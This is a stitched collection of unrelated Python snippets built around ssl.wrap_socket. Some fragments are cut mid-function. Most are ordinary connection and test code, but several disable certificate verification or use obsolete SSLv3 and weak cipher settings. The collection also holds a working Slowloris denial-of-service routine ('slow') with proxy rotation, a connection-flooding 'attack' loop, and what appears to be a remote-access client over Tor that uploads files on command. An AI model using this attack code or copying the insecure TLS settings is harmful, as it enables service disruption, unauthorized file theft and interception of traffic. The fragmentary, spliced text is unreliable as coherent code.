def connect(self): ssl_version = FOUND_SSL_PROTOCOLS.get(self.host) if ssl_version is not None: self.sock = ssl.wrap_socket( self._create_socket(), self.key_file, self.cert_file, ssl_version=ssl_version) else: while True: to_try = TRY_SSL_PROTOCOLS[self.host] if not to_try: TRY_SSL_PROTOCOLS.pop(self.host, None) message = u('Could not open ssl url: %s') % self.host raise Error('url', message) ssl_version = to_try.pop(0) try: self.sock = ssl.wrap_socket( self._create_socket(), self.key_file, self.cert_file, ssl_version=ssl_version) except ssl.SSLError: continue FOUND_SSL_PROTOCOLS[self.host] = ssl_version break
def do_connect(host, port, use_ssl, timeout=None): # do IPv4 if not is_v6(host): if use_ssl: s = socket.socket( socket.AF_INET, socket.SOCK_STREAM) #defaults to PROTOCOL_v23 in client mode. ciphers will be negotiated based on handshake from server sock = ssl.wrap_socket( s ) #sock.setblocking(False) else: sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) #fcntl.fcntl(sock, fcntl.F_SETFL, os.O_NONBLOCK) # do IPv6 else: if use_ssl: s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) sock = ssl.wrap_socket( s ) #sock.setblocking(False) else: sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) #fcntl.fcntl(sock, fcntl.F_SETFL, os.O_NONBLOCK) # don't block sock.setblocking(False) sock.settimeout(timeout) # light this candle sock.connect((host,port)) return sock
def wrap_socket(sock, verify_cert, ca_certs): cafiles = [] cafiles = [ '/etc/ssl/certs/ca-certificates.crt', # ubuntu/debian '/etc/pki/tls/certs/ca-bundle.crt', # redhat/centos '/etc/ssl/cert.pem', # openbsd ] if not verify_cert: return ssl.wrap_socket(sock) if not ca_certs: for f in cafiles: if os.path.isfile(f): ca_certs = f continue if ca_certs is not None: return ssl.wrap_socket(sock, cert_reqs=ssl.CERT_REQUIRED, ca_certs=ca_certs) tempdir = tempfile.mkdtemp() try: filename = os.path.join(tempdir, "cert") temp = open(filename, "w+b") try: temp.write(WRAP_CERT) finally: temp.close() return ssl.wrap_socket(sock, cert_reqs=ssl.CERT_REQUIRED, ca_certs=filename) finally: shutil.rmtree(tempdir)
def _socket_connect(self): """Create socket and connect to it, using SSL if enabled.""" # Create our socket and set our socket options self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) self.socket.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1) # Wrap the SSL socket if we SSL turned on ssl_text = "" if self.parameters.ssl: ssl_text = " with SSL" if self.parameters.ssl_options: # Always overwrite this value self.parameters.ssl_options['do_handshake_on_connect'] = \ self._ssl_handshake self.socket = ssl.wrap_socket(self.socket, **self.parameters.ssl_options) else: self.socket = ssl.wrap_socket(self.socket, do_handshake_on_connect= \ self._ssl_handshake) # Flags for SSL handshake negotiation self._ssl_connecting = True # Try and connect log.info("Connecting fd %d to %s:%i%s", self.socket.fileno(), self.parameters.host, self.parameters.port, ssl_text) self.socket.settimeout(CONNECTION_TIMEOUT) self.socket.connect((self.parameters.host, self.parameters.port)) # Set the socket to non-blocking self.socket.setblocking(0)
def SSLWrapper(sock, verify): """ Wraps a socket in ssl - requires pythons ssl module """ try: import ssl if not verify: # not verifying, just wrap and return return ssl.wrap_socket(sock) # okay now verifying. if not os.path.isfile("Data/cert.pem"): print "[ErrorLine] Data/cert.pem file doesn't exit, can't verify" sys.exit() return ssl.wrap_socket(sock, ca_certs="Data/cert.pem", cert_reqs=ssl.CERT_REQUIRED) except ImportError: print "[ErrorLine] No 'ssl' module, please install it." except Exception: print "[ErrorLine] SSL error:" traceback.print_exc() # only if it's failed (as successful call would have return by now) try: sock.close() except Exception: pass sys.exit()
def _get_ssl_socket(self, stream, **kwargs): # This makes it simpler for SMTP_SSL to use the SMTP connect code # and just alter the socket connection bit. callback = kwargs.pop('callback') if hasattr(self, '__get_ssl_socket'): callback(self.__get_ssl_socket) return if PY3: # due to ssl wrap_socket will detach argument sock in Python 3 and # can't be used no longer.Also the behaviour of socket.socket.close # is different between 2 and 3. sock = stream.socket iden_sock = socket.fromfd(sock.fileno(), sock.family, sock.type) ssl_sock = ssl.wrap_socket( iden_sock, do_handshake_on_connect=False, **kwargs) stream.close() else: ssl_sock = ssl.wrap_socket( stream.socket, do_handshake_on_connect=False, **kwargs) stream.close() stream = iostream.SSLIOStream(ssl_sock) self.__get_ssl_socket = stream callback(stream)
def _wrap_socket(sock): if conf.ssl_verify or conf.ssl_reverse: return ssl.wrap_socket(sock, ssl_version=conf._ssl_version, cert_reqs=ssl.CERT_REQUIRED, ca_certs=conf.ssl_verify) else: return ssl.wrap_socket(sock, ssl_version=conf._ssl_version)
def get_socket(self): if self.use_ssl: cert_path = os.path.join(self.config_path, 'certs', self.host) if not os.path.exists(cert_path): is_new = True s = self.get_simple_socket() if s is None: return # try with CA first try: s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_REQUIRED, ca_certs=ca_path, do_handshake_on_connect=True) except ssl.SSLError, e: s = None if s and self.check_host_name(s.getpeercert(), self.host): self.print_error("SSL certificate signed by CA") return s # get server certificate. # Do not use ssl.get_server_certificate because it does not work with proxy s = self.get_simple_socket() if s is None: return try: s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_NONE, ca_certs=None) except ssl.SSLError, e: self.print_error("SSL error retrieving SSL certificate:", e) return dercert = s.getpeercert(True) s.close() cert = ssl.DER_cert_to_PEM_cert(dercert) # workaround android bug cert = re.sub("([^\n])-----END CERTIFICATE-----","\\1\n-----END CERTIFICATE-----",cert) temporary_path = cert_path + '.temp' with open(temporary_path,"w") as f: f.write(cert)
def connect(self): sock = socket.create_connection((self.host, self.port), self.timeout) if (self.need_server_auth == True): self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ca_certs=self.ca_file, cert_reqs=ssl.CERT_REQUIRED) else: self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ca_certs=self.ca_file)
def _openConnection(self): """ open the (SSL) socket and return True. # TODO: support server certificate validation, provide client cert """ try: self._log("python default ssl connection failed, trying TLSv1", 2) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self._hostname, self._port)) self._socket = ssl.wrap_socket(s, self._keyfile, self._certfile, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="AES256-SHA") return True except ssl.SSLError: try: s.close() except: pass raise Exception("Error setting up the SSL/TLS socket to murmur.") try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self._hostname, self._port)) self._log("trying python default ssl socket", 3) self._socket = ssl.wrap_socket(s) return True except ssl.SSLError: try: s.close() except: pass
def connect(self): # If the ssl library is not available, then we just have to fall back on old HTTPSConnection.connect # method. There are too many dependencies to implement it directly here. if not self.__has_ssl: # Unfortunately, the only way to set timeout is to temporarily set the global default timeout # for what it should be for this connection, and then reset it once the connection is established. # Messy, but not much we can do. old_timeout = None try: old_timeout = socket.getdefaulttimeout() socket.setdefaulttimeout(self.__timeout) httplib.HTTPSConnection.connect(self) return finally: socket.setdefaulttimeout(old_timeout) # Create the underlying socket. Prefer Python's newer socket.create_connection method if it is available. if hasattr(socket, 'create_connection'): self.sock = socket.create_connection((self.host, self.port), self.__timeout) else: self.sock = create_connection_helper(self.host, self.port, timeout=self.__timeout) if self._tunnel_host: self._tunnel() # Now ask the ssl library to wrap the socket and verify the server certificate if we have a ca_file. if self.__ca_file is not None: self.sock = ssl.wrap_socket(self.sock, ca_certs=self.__ca_file, cert_reqs=ssl.CERT_REQUIRED) else: self.sock = ssl.wrap_socket(self.sock, cert_reqs=ssl.CERT_NONE)
def connect(self): import sys if sys.version_info >= (2,7,0): sock = socket.create_connection((self.host, self.port), self.timeout, self.source_address) else: sock = socket.create_connection((self.host, self.port), self.timeout) # Note these next fixes require python at least from Oct 2009 so 2.6.3 if sys.version_info >= (2,6,3): if self._tunnel_host: self.sock = sock self._tunnel() # Force use of TLSv1 with PROTOCOL_TLSv1 # Default is PROTOCOL_SSLv23 which allows either 2 or 3 # Another option is PROTOCOL_SSLv3 # We want TLS1 to avoid POODLE vulnerability. In addition, some client/server combinations fail the handshake # if you start with SSL23 and the server wants TLS1. See geni-tools issue #745 if self.ssl_version is None: #print "Requested a None ssl version" self.ssl_version = ssl.PROTOCOL_TLSv1 #print "Wrapping socket to use SSL version %s" % ssl._PROTOCOL_NAMES[self.ssl_version] if sys.version_info >= (2,7,0): #if self.ciphers is None: # print "Using cipherlist: 'DEFAULT:!aNULL:!eNULL:!LOW:!EXPORT:!SSLv2'" #else: # print "Using cipherlist: '%s'" % self.ciphers self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=self.ssl_version, ciphers=self.ciphers) else: # Python 2.6 doesn't let you specify the ciphers to use self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=self.ssl_version)
def testConnect(self): s = ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_NONE) s.connect(("svn.python.org", 443)) c = s.getpeercert() if c: raise test_support.TestFailed("Peer cert %s shouldn't be here!") s.close() # this should fail because we have no verification certs s = ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_REQUIRED) try: s.connect(("svn.python.org", 443)) except ssl.SSLError: pass finally: s.close() # this should succeed because we specify the root cert s = ssl.wrap_socket( socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_REQUIRED, ca_certs=SVN_PYTHON_ORG_ROOT_CERT ) try: s.connect(("svn.python.org", 443)) except ssl.SSLError, x: raise test_support.TestFailed("Unexpected exception %s" % x)
def handshake(host, port, ticket, cfg_file, thumbprint): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) expect(sock, VMAD_WELCOME) sock = ssl.wrap_socket(sock) sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) cert = sock.getpeercert(binary_form=True) h = hashlib.sha1() h.update(cert) if thumbprint != h.hexdigest(): raise Exception("Server thumbprint doesn't match") sock.write("%s %s\r\n" % (VMAD_USER_CMD, ticket)) expect(sock, VMAD_NEEDPASSWD) sock.write("%s %s\r\n" % (VMAD_PASS_CMD, ticket)) expect(sock, VMAD_LOGINOK) rand = os.urandom(12) rand = base64.b64encode(rand) sock.write("%s %s\r\n" % (VMAD_THUMB_CMD, rand)) thumbprint2 = expect(sock, VMAD_OK) thumbprint2 = thumbprint2.replace(':', '').lower() sock.write("%s %s mks\r\n" % (VMAD_CONNECT_CMD, cfg_file)) expect(sock, VMAD_OK) sock2 = ssl.wrap_socket(sock) cert2 = sock2.getpeercert(binary_form=True) h = hashlib.sha1() h.update(cert2) if thumbprint2 != h.hexdigest(): raise Exception("Second thumbprint doesn't match") sock2.write(rand) return sock2
def build_sockets(self): self.debug.put('Socket Builder started.') count = 0 while (self.options['attacklimit'] == 0 or self.options['attacklimit'] > self.attacks) and self.running: if self.options['connectionlimit'] > self.sockets: if self.options['socksversion'] == 'SOCKS4' or self.options['socksversion'] == 'SOCKS5' or self.options['socksversion'] == 'HTTP': if self.options['socksversion'] == 'SOCKS4': proxytype = socks.PROXY_TYPE_SOCKS4 elif self.options['socksversion'] == 'SOCKS5': proxytype = socks.PROXY_TYPE_SOCKS5 else: proxytype = socks.PROXY_TYPE_HTTP s = socks.socksocket() if self.options['socksuser'] == '' and self.options['sockspass'] == '': s.setproxy(proxytype, self.options['sockshost'], self.options['socksport'], self.options['socksuser'], self.options['sockspass']) else: s.setproxy(proxytype, self.options['sockshost'], self.options['socksport']) else: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((self.options['host'], self.options['port'])) if self.options['ssl'] == True: wrap_socket(s) self.connections.put((s, 0)) self.debug.put('Socket opened, connection created.') self.attacks += 1 self.sockets += 1 except Exception, ex: self.errors.put('Could not connect. %s.' % (ex)) if self.options['timebetweenconnections'] > 0: time.sleep(self.options['timebetweenconnections'])
def start(self): self.server = self.config['server'] self.port = int(self.config['port']) if self.config['proxyhost'] is None: if self.config['ssl'] is True: if self.ipv6: self.sock = wrap_socket(socket.socket(socket.AF_INET6, socket.SOCK_STREAM)) else: self.sock = wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) else: if self.ipv6: self.sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) else: self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) else: if self.config['ssl'] is True: temp_socket = socks.socksocket() temp_socket.setproxy(socks.PROXY_TYPE_SOCKS4, self.config['proxyhost'], self.config['proxyport'], True) self.sock = wrap_socket(temp_socket) else: self.sock = socks.socksocket() self.sock.setproxy(socks.PROXY_TYPE_SOCKS4, self.config['proxyhost'], self.config['proxyport'], True) self.sock.connect((self.server, self.port)) #send pass if self.config["pass"] is not None: self.send("PASS " + self.config["pass"], True) self.send("USER " + self.user + " 127.0.0.1 " + self.server + " :" + self.real, True) self.set_nick(self.nick) self.main()
def connect(self, host, port): self.dispatcher = RabbitDispatcher(self) self.dispatcher.create_socket(socket.AF_INET, socket.SOCK_STREAM) # Wrap the SSL socket if we SSL turned on if self.parameters.ssl: self.dispatcher.socket.setblocking(1) if self.parameters.ssl_options: self.dispatcher.socket = ssl.wrap_socket(self.dispatcher.socket, **self.parameters.ssl_options) else: self.dispatcher.socket = ssl.wrap_socket(self.dispatcher.socket) # Fix 2.7.1+ SSL socket bug # If Python version is 2.7.1, we should connect it first, # then everything works OK # if we use Python 2.7.2, and we connect it first, then we will get a # double connect exception. # so we only connect the socket when Python version is 2.7.1 if platform.python_version().startswith("2.7.1"): self.dispatcher.socket.connect((host, port or spec.PORT)) # Set the socket to non-blocking if not self.parameters.ssl: self.dispatcher.socket.setblocking(0) self.dispatcher.connect((host, port or spec.PORT))
def socket_with_cert(cert_path, key_path, cacert_path, server_cert = True): cert_path = os.path.join(_support.DATA_DIR, cert_path) key_path = os.path.join(_support.DATA_DIR, key_path) cacert_path = os.path.join(_support.DATA_DIR, cacert_path) listen_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) listen_sock.bind(("127.0.0.1", 0)) listen_sock.listen(1) addr = listen_sock.getsockname() def thread_func(): try: sock = listen_sock.accept()[0] sock.setblocking(True) # pylint: disable=E1101 try: ssl.wrap_socket(sock, key_path, cert_path, server_side = server_cert, ca_certs = cacert_path) finally: sock.close() finally: listen_sock.close() thread = threading.Thread(target = thread_func, name = "pyxmpp2.test.cert certificate provider thread") thread.daemon = True thread.start() client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_sock.connect(addr) if server_cert: return ssl.wrap_socket(client_sock, cert_reqs = ssl.CERT_REQUIRED, server_side = False, ca_certs = cacert_path) else: s_cert_path = os.path.join(_support.DATA_DIR, "server.pem") s_key_path = os.path.join(_support.DATA_DIR, "server-key.pem") return ssl.wrap_socket(client_sock, s_key_path, s_cert_path, cert_reqs = ssl.CERT_REQUIRED, server_side = True, ca_certs = cacert_path)
def connect(self): """Connect to a host on a given (SSL) port. Use ca_file to check Server Certificate. Redefined/copied and extended from httplib.py:1105 (Python 2.6.x). This is needed to pass cert_reqs=ssl.CERT_REQUIRED as parameter to ssl.wrap_socket(), which forces SSL to check server certificate against our client certificate. """ source_address = getattr(self, 'source_address', None) socket_args = [(self.host, self.port), self.timeout] + ( [source_address, ] if source_address else []) sock = socket.create_connection(*socket_args) if self._tunnel_host: self.sock = sock self._tunnel() try: if self.ignore_ssl: self.sock = ssl.wrap_socket( sock, self.key_file, self.cert_file, cert_reqs=ssl.CERT_NONE) else: self.sock = ssl.wrap_socket( sock, self.key_file, self.cert_file, ca_certs=self.ca_file, cert_reqs=ssl.CERT_REQUIRED) except UnicodeError as ue: raise SSLUnicodeError(0, SSLUnicodeError.__doc__, ue)
def urfa_login(self): """ handshake and login """ self.sck.connect((self.addr, self.port)) self.pck.recv(self.sck) session_id = self.pck.attr[U_CODE_ATTR_SID]['data'] auth_hash_digest = hashlib.new('md5') auth_hash_digest.update(session_id) auth_hash_digest.update(self.passwd) auth_hash = auth_hash_digest.digest() self.pck.init(code=U_PKT_REQ) if self.admin: login_type = U_LGN_SYS ssl_type = U_SSLT_RSACRT else: login_type = U_LGN_USR ssl_type = U_SSLT_SSL3 self.pck.add_attr(U_CODE_ATTR_LGN_T, login_type, U_TP_I) self.pck.add_attr(U_CODE_ATTR_LGN, self.login, U_TP_S) self.pck.add_attr(U_CODE_ATTR_DGS, session_id, U_TP_S) self.pck.add_attr(U_CODE_ATTR_HSH, auth_hash, U_TP_S) self.pck.add_attr(U_CODE_ATTR_SSL, ssl_type, U_TP_I) self.pck.send(self.sck) self.pck.recv(self.sck) if self.pck.code == U_PKT_ACCEPT: if self.admin: self.sck = ssl.wrap_socket(self.sck, certfile=self.crt_file, ssl_version=ssl.PROTOCOL_SSLv3) else: self.sck = ssl.wrap_socket(self.sck, ciphers='ADH-RC4-MD5', ssl_version=ssl.PROTOCOL_SSLv3)
def test_handshake_timeout(self): # Issue #5103: SSL handshake must respect the socket timeout server = socket.socket(socket.AF_INET) host = "127.0.0.1" port = test_support.bind_port(server) started = threading.Event() finish = False def serve(): server.listen(5) started.set() conns = [] while not finish: r, w, e = select.select([server], [], [], 0.1) if server in r: # Let the socket hang around rather than having # it closed by garbage collection. conns.append(server.accept()[0]) t = threading.Thread(target=serve) t.start() started.wait() try: try: c = socket.socket(socket.AF_INET) c.settimeout(0.2) c.connect((host, port)) # Will attempt handshake and time out try: ssl.wrap_socket(c) except ssl.SSLError, e: self.assertTrue("timed out" in str(e), str(e)) else: self.fail("SSLError wasn't raised")
def connect(self): # overrides the version in httplib so that we do certificate verification try: # this is a convenience function added in python 2.6 sock = socket.create_connection((self.host, self.port), self.timeout) except AttributeError: # There is no timeout attribute in earlier versions of this object. # The only option available is to set a global default timeout for # all socket objects. socket.setdefaulttimeout(10) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((self.host, self.port)) # This code is not available for older versions of python and seems to # have no effect on establishing a verified https connection. #if self._tunnel_host: # self.sock = sock # self._tunnel() # wrap the socket using verification with the Thawte root cert if VerifiedHTTPSConnection.do_verification: self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, cert_reqs=ssl.CERT_REQUIRED, ca_certs=self.certs_file) if VerifiedHTTPSConnection.do_domain_verification: cert_subject = self.sock.getpeercert()['subject'] cert_dict = {} for c in cert_subject: cert_dict.update(c) cert_host = cert_dict['commonName'] if self.host != cert_host: raise SSLVerificationError("Certificate doesn't match domain; untrusted connection") else: self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file)
def connect(self): """ Connect to a host on a given port and check the certificate This is almost the same than the conect of HTTPSConnection, but adds some function for SSL certificate verification """ sock = socket.create_connection((self.host, self.port), self.timeout) if self._tunnel_host: self.sock = sock self._tunnel() if self.ca_file: self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ca_certs = self.ca_file, cert_reqs=ssl.CERT_REQUIRED) else: self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, cert_reqs=ssl.CERT_NONE) self.certificate = self.sock.getpeercert(True) if self.callBack: if not self.callBack(self.certificate): raise ssl.SSLError(1, "Call back verification failed")
def connect(self, attempts=1, peer=None): for i in range(0, attempts): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(TIMEOUT) if self.cert != None: self.socket = ssl.wrap_socket(sock, keyfile='{0}.key'.format(self.cert), certfile='{0}.crt'.format(self.cert), ca_certs='{0}.crt'.format(self.ca), cert_reqs=ssl.CERT_REQUIRED, ssl_version=self.ssl_version) else: self.socket = ssl.wrap_socket(sock, ca_certs='{0}.crt'.format(self.ca), cert_reqs=ssl.CERT_REQUIRED, ssl_version=self.ssl_version) self.socket.connect((LOCALHOST, self.port)) if peer != None: if self.socket.getpeercert()['subject'][3][0][1] == peer: return self else: print("Did not connect to expected peer: {0}".format(self.socket.getpeercert())) else: return self except Exception as e: print(e) if attempts==1: raise e print("Trying to connect to {0}...".format(self.port)) time.sleep(1) raise Exception("did not connect to peer")
def start(self): """ Creates a SSL connection to the iDigi Server and sends a ConnectionRequest message. """ self.log.info("Starting SSL Session for Monitor %s." % self.monitor_id) if self.socket is not None: raise Exception("Socket already established for %s." % self) try: # Create socket, wrap in SSL and connect. self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Validate that certificate server uses matches what we expect. if self.ca_certs is not None: self.socket = ssl.wrap_socket(self.socket, cert_reqs=ssl.CERT_REQUIRED, ca_certs=self.ca_certs) else: self.socket = ssl.wrap_socket(self.socket) self.socket.connect((self.client.hostname, PUSH_SECURE_PORT)) self.socket.setblocking(0) except Exception as exception: self.socket.close() self.socket = None raise exception self.send_connection_request()
def connect(self): """ Connect to a host on a given (SSL) port. Use ca_file pointing somewhere, use it to check Server Certificate. Redefined/copied and extended from httplib.py:1105 (Python 2.6.x). """ host = self.host port = self.port sock = socket.create_connection((self.host, self.port), self.timeout) LOG.debug(_("Connecting to Https server host %(host)s port %(port)s " % locals())) if self._tunnel_host: self.sock = sock self._tunnel() # If there's no CA File, don't force Server Certificate Check if self.ca_file: self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=ssl.PROTOCOL_SSLv23, ca_certs=self.ca_file, cert_reqs=ssl.CERT_REQUIRED) LOG.debug(_("Https server certified " % locals())) s = self.sock cert = s.getpeercert() else: self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, cert_reqs=ssl.CERT_NONE)
def _http_connect(hostname, port, use_ssl): p_url = urlparse.urlparse(conf.proxy) p_hostname = p_url.hostname p_port = p_url.port p_use_ssl = True if p_url.scheme[-1] == 's' else False try: sock = socket.create_connection((p_hostname, p_port)) except socket.error: raise ProxyError("Unable to connect to the proxy") if p_use_ssl: try: # No check is made to verify proxy certificate sock = ssl.wrap_socket(sock, ssl_version=conf._ssl_version) except socket.error: raise ProxyError("Unable to use SSL with the proxy") if use_ssl: f = sock.makefile("rwb", 0) f.write("CONNECT {}:{} HTTP/1.1\r\n\r\n".format(hostname, port)) try: v, s, m = read_banner(f) except ValueError: raise BadStatusLine() if s != "200": raise ProxyError("Bad status " + s + " " + m) _ = read_headers(f) sock = ssl.wrap_socket(sock, ssl_version=conf._ssl_version) return sock
def SSL_Connect(ctx, sock, server_side=False, accepted=False, connected=False, verify_names=None): if DEBUG: DEBUG('*** TLS is provided by native Python ssl') reqs = (verify_names and ssl.CERT_REQUIRED or ssl.CERT_NONE) try: fd = ssl.wrap_socket(sock, keyfile=ctx.privatekey_file, certfile=ctx.certchain_file, cert_reqs=reqs, ca_certs=ctx.ca_certs, do_handshake_on_connect=False, ssl_version=ctx.method, ciphers=ctx.ciphers, server_side=server_side) except: fd = ssl.wrap_socket(sock, keyfile=ctx.privatekey_file, certfile=ctx.certchain_file, cert_reqs=reqs, ca_certs=ctx.ca_certs, do_handshake_on_connect=False, ssl_version=ctx.method, server_side=server_side) if verify_names: fd.do_handshake() if not SSL_CheckPeerName(fd, verify_names): raise SSL.Error(('Cert not in %s (%s)' ) % (verify_names, reqs)) return fd
def connect(self): try: sock = socket.create_connection( (self.host, self.port), self.timeout ) except AttributeError: # Python 2.4 compatibility (does not deal with IPv6) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((self.host, self.port)) try: if self._tunnel_host: self.sock = sock self._tunnel() except AttributeError: # Python 2.4 compatibility (_tunnel_host not defined) pass try: self.sock = ssl.wrap_socket( sock, self.key_file, self.cert_file, ssl_version=ssl.PROTOCOL_TLSv1 ) except ssl.SSLError: self.sock = ssl.wrap_socket( sock, self.key_file, self.cert_file, ssl_version=ssl.PROTOCOL_SSLv23 )
def test_for_leaks(): # Let's test for leaks first p_server = compile_and_invoke( "t2_tls_leaks.hs" ) ld = LeakDetector(p_server.pid) sockets = [] time.sleep(1.0) for i in range(200): conn = wrap_socket( socket.create_connection(("127.0.0.1", 8090)) ) sockets.append(conn) repeats = 12 exercises = 50 for i in range(repeats): ld.sample() nsockets = [] for i in range(exercises): conn = wrap_socket( socket.create_connection(("127.0.0.1", 8090)) ) nsockets.append(conn) for ns in nsockets: ns.close() n = repeats * exercises re = rconnect() ensure(re.counter("socket-close-called")>1, "not even a socket-close called") ensure(re.counter("socket-close-called")>= n, "not enough closed sockets") ensure(re.counter("socket-shutdown-executed")>= n, "not enough sockets shutdown") ensure(re.counter("socket-close-executed")>= n, "not enough sockets closed") ensure(re.counter("stable-pointer-freed")>1, "we are leaking stable pointers") ensure(not ld.leaks(sample_size=repeats//2), "It's leaking memory!") os.kill(-p_server.pid, signal.SIGTERM)
print("Cert ok") else: print "nope" else: with open("certificate.pem", "wa") as out: out.write(certificate) out.close() print("Cert generated") sock = socks.socksocket() sock.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050) sock.connect((host, 5555)) #ca_certs="certificate.pem" ssl_sock = ssl.wrap_socket(sock, ca_certs="server.crt", cert_reqs=ssl.CERT_REQUIRED) print repr(ssl_sock.getpeername()) print ssl_sock.cipher() infosServer = ssl_sock.getpeercert() #ssl.match_hostname(infosServer,host) #SendData(cType) while 1: inText = RecvData() if inText.startswith("download"): UploadFILE(inText.split("|")[1]) elif inText == "alive": SendData(cType + " :: alive") elif inText.startswith("info"):
def slow(conn, socks_type): proxy = random.choice(proxies).strip().split(":") if socks_type == 4: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) if socks_type == 5: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) for _ in range(conn): try: s = socks.socksocket() s.settimeout(0.6) s.connect((str(ip), int(port))) if str(port) == '443': s = ssl.wrap_socket(s) s.send("GET /?{} HTTP/1.1\r\n".format(random.randint( 0, 2000)).encode("utf-8")) # Slowloris format header s.send("User-Agent: {}\r\n".format( random.choice(useragents)).encode("utf-8")) s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode( "utf-8")) s.send(("Connection:keep-alive").encode("utf-8")) socket_list.append(s) sys.stdout.write("[*] Running Slow Attack || Connections: " + str(len(socket_list)) + "\r") sys.stdout.flush() except: s.close() proxy = random.choice(proxies).strip().split( ":") #Only change proxy when error, increase the performance if socks_type == 4: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) if socks_type == 5: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) sys.stdout.write("[*] Running Slow Attack || Connections: " + str(len(socket_list)) + "\r") sys.stdout.flush() while True: for s in list(socket_list): try: s.send("X-a: {}\r\n".format(random.randint( 1, 5000)).encode("utf-8")) sys.stdout.write("[*] Running Slow Attack || Connections: " + str(len(socket_list)) + "\r") sys.stdout.flush() except: s.close() socket_list.remove(s) sys.stdout.write("[*] Running Slow Attack || Connections: " + str(len(socket_list)) + "\r") sys.stdout.flush() proxy = random.choice(proxies).strip().split(":") if socks_type == 4: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) if socks_type == 5: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) for _ in range(conn - len(socket_list)): try: s.settimeout(1) s.connect((str(ip), int(port))) if str(port) == '443': s = ssl.wrap_socket(s) s.send("GET /?{} HTTP/1.1\r\n".format(random.randint( 0, 2000)).encode("utf-8")) # Slowloris format header s.send("User-Agent: {}\r\n".format( random.choice(useragents)).encode("utf-8")) s.send("{}\r\n".format( "Accept-language: en-US,en,q=0.5").encode("utf-8")) s.send(("Connection:keep-alive").encode("utf-8")) socket_list.append(s) sys.stdout.write("[*] Running Slow Attack || Connections: " + str(len(socket_list)) + "\r") sys.stdout.flush() except: proxy = random.choice(proxies).strip().split(":") if socks_type == 4: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) if socks_type == 5: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) sys.stdout.write("[*] Running Slow Attack || Connections: " + str(len(socket_list)) + "\r") sys.stdout.flush() pass
class PatchedContext: def __init__(self, conn): conn._check_hostname = False conn._context.check_hostname = False self.ctx = conn._context def __getattr__(self, attr): if attr == 'wrap_socket': return lambda sock, server_hostname: self.ctx.wrap_socket(sock) return getattr(self.ctx, attr) if __name__ == '__main__': basic_auth, proxy, port = get_proxy() req = 'GET {url} HTTP/1.0\nProxy-Authorization: BASIC {basic_auth}\n\n'.format( url='http://httpbin.org/ip', basic_auth=basic_auth) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock = ssl.wrap_socket(sock) sock.connect((proxy, port)) sock.send(req.encode('ascii')) print(sock.recv(1024)) sock.close() # or with ugly monkey patch conn = http.client.HTTPSConnection(proxy, port) conn._context = PatchedContext(conn) conn.request("GET", "http://httpbin.org/ip", headers={"Proxy-Authorization": "BASIC " + basic_auth}) print(conn.getresponse().read())
